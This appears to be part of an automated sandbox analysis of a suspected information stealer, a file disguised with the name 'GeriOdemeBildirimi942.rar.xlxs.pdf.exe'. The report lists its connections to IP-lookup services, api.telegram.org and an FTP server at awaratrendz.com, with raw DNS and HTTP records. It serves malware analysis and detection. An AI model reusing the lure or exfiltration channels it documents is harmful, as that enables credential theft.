                                                            Oct 3, 2024 09:16:48.618813038 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.627315044 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.627334118 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.759433031 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.759533882 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.759748936 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.835870981 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.993597031 CEST4973380192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:48.993628979 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:48.998891115 CEST8049736132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:48.998977900 CEST8049733132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:48.998991013 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:48.999042034 CEST4973380192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:48.999166012 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:49.004062891 CEST8049736132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:49.675026894 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:49.693658113 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:49.693805933 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:49.864075899 CEST8049736132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:49.865583897 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:49.865632057 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:49.865730047 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:49.865953922 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:49.865971088 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:49.906367064 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.377252102 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:50.379117012 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:50.379152060 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:50.544749975 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:50.544883966 CEST44349738188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:50.544965029 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:50.545367002 CEST49738443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:50.549504995 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.549618006 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.555258036 CEST8049739132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:50.555335999 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.555437088 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.555797100 CEST8049736132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:50.557564974 CEST4973680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:50.562315941 CEST8049739132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:50.589318037 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:50.596858978 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:50.601928949 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:50.959996939 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:50.960336924 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:50.996332884 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:51.574934006 CEST8049739132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:51.576508999 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:51.576555967 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:51.576628923 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:51.576924086 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:51.576935053 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:51.625164032 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:51.658968925 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:51.659131050 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:51.670784950 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.020490885 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.020718098 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:52.031291008 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.079946995 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:52.081674099 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:52.081715107 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:52.215301991 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:52.215416908 CEST44349740188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:52.215610027 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:52.216026068 CEST49740443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:52.219255924 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:52.220452070 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:52.229406118 CEST8049739132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:52.229496002 CEST4973980192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:52.231920958 CEST8049741132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:52.232069016 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:52.232251883 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:52.261724949 CEST8049741132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:52.371349096 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.371491909 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:52.377298117 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.721925020 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:52.722063065 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:52.748981953 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:53.372594118 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:53.372623920 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:53.372817039 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:53.373269081 CEST4974243366192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:53.380516052 CEST4336649742119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:53.380595922 CEST4974243366192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:53.380671024 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:53.386034012 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:54.093714952 CEST8049741132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:54.095098972 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.095144987 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.095215082 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.095423937 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.095436096 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.140916109 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.289454937 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:54.289854050 CEST4974243366192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:54.289901972 CEST4974243366192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:54.307720900 CEST4336649742119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:54.309246063 CEST4336649742119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:54.309329033 CEST4974243366192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:54.343916893 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:54.589421034 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.591151953 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.591208935 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.661472082 CEST2149737119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:54.703274012 CEST4973721192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:54.749871969 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.749974012 CEST44349743188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:54.750073910 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.750627041 CEST49743443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:54.754133940 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.755223989 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.761265039 CEST8049744132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:54.761413097 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.761528969 CEST8049741132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:54.761554956 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.761583090 CEST4974180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:54.768351078 CEST8049744132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:55.603022099 CEST8049744132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:55.604402065 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:55.604458094 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:55.604547024 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:55.604783058 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:55.604805946 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:55.656387091 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.068284988 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:56.070616007 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:56.070636988 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:56.197021008 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:56.197154999 CEST44349745188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:56.197253942 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:56.197727919 CEST49745443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:56.200707912 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.202023983 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.206629992 CEST8049744132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:56.206742048 CEST4974480192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.207082987 CEST8049746132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:56.207165956 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.207454920 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:56.212866068 CEST8049746132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:59.044066906 CEST8049746132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:59.059192896 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.059252977 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:59.059345961 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.059837103 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.059856892 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:59.093939066 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:59.754415989 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:59.754576921 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.755928040 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.755938053 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:59.756185055 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:59.758029938 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:59.803401947 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:17:00.034333944 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:17:00.034410954 CEST44349747149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:17:00.034537077 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:17:00.035001993 CEST49747443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:17:05.199130058 CEST4973180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:17:05.368278980 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:17:05.368696928 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:05.382683039 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:05.382846117 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:05.383779049 CEST8049746132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:17:05.383851051 CEST4974680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:17:06.264187098 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:06.264745951 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:06.269742012 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:06.609932899 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:06.610325098 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:06.615516901 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.288722038 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.288908958 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:07.297192097 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.635574102 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.635885954 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:07.640856028 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.979543924 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:07.980005026 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:07.987647057 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:08.339272976 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:08.339668036 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:08.347855091 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:08.688160896 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:08.689057112 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:08.695334911 CEST4778249749119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:08.695496082 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:08.695727110 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:08.701699972 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.608916044 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.609195948 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.609239101 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.621499062 CEST4778249749119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.622524023 CEST4778249749119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.622590065 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.656536102 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.961546898 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.961678028 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.961956978 CEST4778249749119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.962003946 CEST4974947782192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:09.964710951 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:09.972121000 CEST4778249749119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:10.015815973 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:11.471400023 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:11.478106976 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:11.816059113 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:11.816561937 CEST4975032582192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:11.821526051 CEST3258249750119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:11.821603060 CEST4975032582192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:11.821758986 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:11.826894045 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:12.700716972 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:12.701045990 CEST4975032582192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:12.701086044 CEST4975032582192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:12.705919981 CEST3258249750119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:12.706348896 CEST3258249750119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:12.706404924 CEST4975032582192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:12.750207901 CEST4974821192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:17:13.044482946 CEST2149748119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:17:13.094000101 CEST4974821192.168.2.7119.18.54.39
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 3, 2024 09:16:26.701783895 CEST5207853192.168.2.71.1.1.1
                                                            Oct 3, 2024 09:16:26.709033966 CEST53520781.1.1.1192.168.2.7
                                                            Oct 3, 2024 09:16:27.401612997 CEST5132853192.168.2.71.1.1.1
                                                            Oct 3, 2024 09:16:27.413845062 CEST53513281.1.1.1192.168.2.7
                                                            Oct 3, 2024 09:16:34.100999117 CEST5182453192.168.2.71.1.1.1
                                                            Oct 3, 2024 09:16:34.108045101 CEST53518241.1.1.1192.168.2.7
                                                            Oct 3, 2024 09:16:41.197192907 CEST6028653192.168.2.71.1.1.1
                                                            Oct 3, 2024 09:16:41.204004049 CEST53602861.1.1.1192.168.2.7
                                                            Oct 3, 2024 09:16:47.478091955 CEST5391353192.168.2.71.1.1.1
                                                            Oct 3, 2024 09:16:48.158492088 CEST53539131.1.1.1192.168.2.7
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 3, 2024 09:16:26.701783895 CEST192.168.2.71.1.1.10xfe18Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:27.401612997 CEST192.168.2.71.1.1.10x6a51Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.100999117 CEST192.168.2.71.1.1.10x35efStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:41.197192907 CEST192.168.2.71.1.1.10x407aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:47.478091955 CEST192.168.2.71.1.1.10x7f4fStandard query (0)awaratrendz.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:26.709033966 CEST1.1.1.1192.168.2.70xfe18No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:27.413845062 CEST1.1.1.1192.168.2.70x6a51No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:27.413845062 CEST1.1.1.1192.168.2.70x6a51No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:34.108045101 CEST1.1.1.1192.168.2.70x35efNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:41.204004049 CEST1.1.1.1192.168.2.70x407aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Oct 3, 2024 09:16:48.158492088 CEST1.1.1.1192.168.2.70x7f4fNo error (0)awaratrendz.com119.18.54.39A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • api.telegram.org
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749705193.122.130.0807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:26.726809978 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:27.191643953 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a20097eec4d33ba799f13ee1be510d50
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 3, 2024 09:16:27.199314117 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:27.298789978 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: fa5adc8988c978fa0865fa5dd5e5cfd1
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 3, 2024 09:16:28.241403103 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:28.342165947 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: e1a88024c56111a173471825bf0afc05
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749709193.122.130.0807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:29.045275927 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:29.520260096 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 59a0e9b2fc9cde185c02be14a48319fb
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


